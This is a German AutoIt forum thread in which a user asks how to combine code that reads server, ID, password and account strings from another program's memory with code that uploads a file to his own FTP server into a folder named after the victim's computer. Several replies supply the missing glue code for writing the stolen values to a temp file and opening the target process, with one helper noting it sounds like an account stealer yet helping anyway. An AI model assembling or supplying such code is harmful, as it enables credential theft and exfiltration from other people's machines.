Code zusammsetzten...Hilfe

  • hallo leute...
    ich habe hier 2 codes die will ich gerne zusammfügen...

    Der erste code ist zum auslesen von mein arbeitsspeicher...

    $pro =_MemoryOpen($list[$i][1])
    $server = _MemoryRead("0x05b1384" , $pro,"char[20]")
    $id = _MemoryRead("0x0c66b68" , $pro,"char[20]")
    $pw = _MemoryRead("0x0c66aa8" , $pro,"char[20]")
    $pw2 = _MemoryRead("0x0c24501" , $pro,"char[20]")
    $acc = _MemoryRead("0x0c244f0" , $pro,"char[20]")

    Der zweite code sendet die daten von arbeitsspeicher auf mein FTP-Server...

    Func sending ()
    Local $hDll = DllOpen("Wininet.dll")

    If @error Then MsgBox(0,"","0")
    $s_ServerName = 'xxx'
    $s_Username = 'xxx'
    $s_Password = "xxx"

    $Open = _FTPOpen('my ftp')
    $Conn = _FTPConnect($Open, $s_ServerName, $s_Username, $s_Password)
    _FTPMakeDir($Conn,"/"&@ComputerName)
    $Ftpp = _FtpPutFile($Conn,@systemdir& "/ffdserh.tv", "/"&@ComputerName&"/"&Random(1,999999999,1)&".txt")
    If @error Then MsgBox(0,"1","")

    $Ftpc = _FTPClose($Open)
    DllClose($hDll)
    EndFunc

    So und wie kann ich es jetzt so machen das er den arbeitsspeicher ausliest und dann auf mein ftp server hochlädt???

    für eure hilfe bedanke ich mich schon im vorraus...

  • Variablen wirst Du schlecht auf den FTP-Server 'hochladen' können.

    Du must die Variablen erst mit z.B. FileWriteLine in eine Textdatei schreiben und
    diese dann anschließend mit Deinem zweiten Codebeispiel auf den Server hochladen.

    Zur Nutzung dieses Forum's, ist ein Übersetzer für folgende Begriffe unerlässlich:

    "On-Bort, weier, verscheiden, schädliges, Butten steyling, näckstet, Parr, Porblem, scripe, Kompletenz, harken, manuel zu extramieren, geckukt, würglich, excell, acces oder Compilevorgeng"

  • Variablen wirst Du schlecht auf den FTP-Server 'hochladen' können.

    Du must die Variablen erst mit z.B. FileWriteLine in eine Textdatei schreiben und
    diese dann anschließend mit Deinem zweiten Codebeispiel auf den Server hochladen.

    wie soll ich das denn machen, denn ich bin in der hinsicht noch ein kleiner noobi

  • wie schon gesagt um mein arbeitsspeicher auszulesen und dann aufem webspace zu laden...

  • wie soll ich das denn machen, denn ich bin in der hinsicht noch ein kleiner noobi

    Wie wärs mit AutoIt-Hilfe unter den Funktionen FileOpen, FileClose, FileWriteLine...

    Zur Nutzung dieses Forum's, ist ein Übersetzer für folgende Begriffe unerlässlich:

    "On-Bort, weier, verscheiden, schädliges, Butten steyling, näckstet, Parr, Porblem, scripe, Kompletenz, harken, manuel zu extramieren, geckukt, würglich, excell, acces oder Compilevorgeng"

  • Wie wärs mit AutoIt-Hilfe unter den Funktionen FileOpen, FileClose, FileWriteLine...

    die hilfe im autoit ist komplet auf english und diese sprache bin ich leider nicht mächtig...

  • Dann fängst Du falsch an... Erst etwas Englisch, dann 'Hello World' programmieren und dann geht's weiter mit solchen Dingen.

    Aber zum Beispiel so:

    [autoit]

    $fileID = FileOpen(@TempDir & "\Upload.txt",2) ; Datei in TEMP öffnen und Inhalt ersetzen durch
    $pro =_MemoryOpen($list[$i][1])
    FileWriteLine($FileID,$pro) ; dies in eine Zeile
    $server = _MemoryRead("0x05b1384" , $pro,"char[20]")
    FileWriteLine($FileID,$server) ; dies in die nächste
    $id = _MemoryRead("0x0c66b68" , $pro,"char[20]")
    FileWriteLine($FileID,$id) ; dies in die nächste
    $pw = _MemoryRead("0x0c66aa8" , $pro,"char[20]")
    FileWriteLine($FileID,$pw) ; dies in die nächste
    $pw2 = _MemoryRead("0x0c24501" , $pro,"char[20]")
    FileWriteLine($FileID,$pw2) ; dies in die nächste
    $acc = _MemoryRead("0x0c244f0" , $pro,"char[20]")
    FileWriteLine($FileID,$acc) ; dies in die nächste
    FileClose($fileID)

    [/autoit]

    Zur Nutzung dieses Forum's, ist ein Übersetzer für folgende Begriffe unerlässlich:

    "On-Bort, weier, verscheiden, schädliges, Butten steyling, näckstet, Parr, Porblem, scripe, Kompletenz, harken, manuel zu extramieren, geckukt, würglich, excell, acces oder Compilevorgeng"

  • "Hello World" habe ich schon durch...

    der code ist ja schön und gut, aber ich bekomme immer die fehler meldung

    $pro =_MemoryOpen($list[$i][1])
    $pro =_MemoryOpen(^ ERROR

    Was ist denn daran falsch???

  • Das kann ich Dir nicht sagen.

    Was Du in deinem Code in der Variable ablegst, musst Du schon selbst wissen. Nur der von Dir gepostete Code-Ausschnitt alleine, kann so nicht laufen. Wenn Du kein Programmcode davor hast, der das Array '$list' mit plausiblen Daten füllt, dann musst Du dich mal schlau machen, wie die Funktion '_MemoryOpen()' aufgerufen wird.

    Zur Nutzung dieses Forum's, ist ein Übersetzer für folgende Begriffe unerlässlich:

    "On-Bort, weier, verscheiden, schädliges, Butten steyling, näckstet, Parr, Porblem, scripe, Kompletenz, harken, manuel zu extramieren, geckukt, würglich, excell, acces oder Compilevorgeng"

  • Dein Code klingt zwar irgendwie nach Account-Stealer aber naja...

    Zitat

    $list[$i][1]


    Hast du das Array $list vorher richtig deklariert ?

  • Dein Code klingt zwar irgendwie nach Account-Stealer aber naja...


    Hast du das Array $list vorher richtig deklariert ?

    @mehrsolala: Ich gehe mal davon aus, das er vorher weder $list deklariert hat, noch im Array irgendwelche Werte stehen.

    @DragonFire:

    Die Memory-Funktionen scheinen so verwendet zu werden (gefunden hier im Forum):

    [autoit]

    $pid = ProcessExists("beispiel.exe")
    If $pid <> 0 Then
    $hpid = _memoryopen($pid)
    $daten = _memoryread($hpid ,0x0123456)
    _memoryclose($hpid)
    EndIf

    [/autoit]

    Du brauchst also die Process-ID deines Programms und die übergibst Du der MemoryOpen-Funktion,
    anstatt der nicht definierten Array-variablen '$list[$i][1]'.

    Zur Nutzung dieses Forum's, ist ein Übersetzer für folgende Begriffe unerlässlich:

    "On-Bort, weier, verscheiden, schädliges, Butten steyling, näckstet, Parr, Porblem, scripe, Kompletenz, harken, manuel zu extramieren, geckukt, würglich, excell, acces oder Compilevorgeng"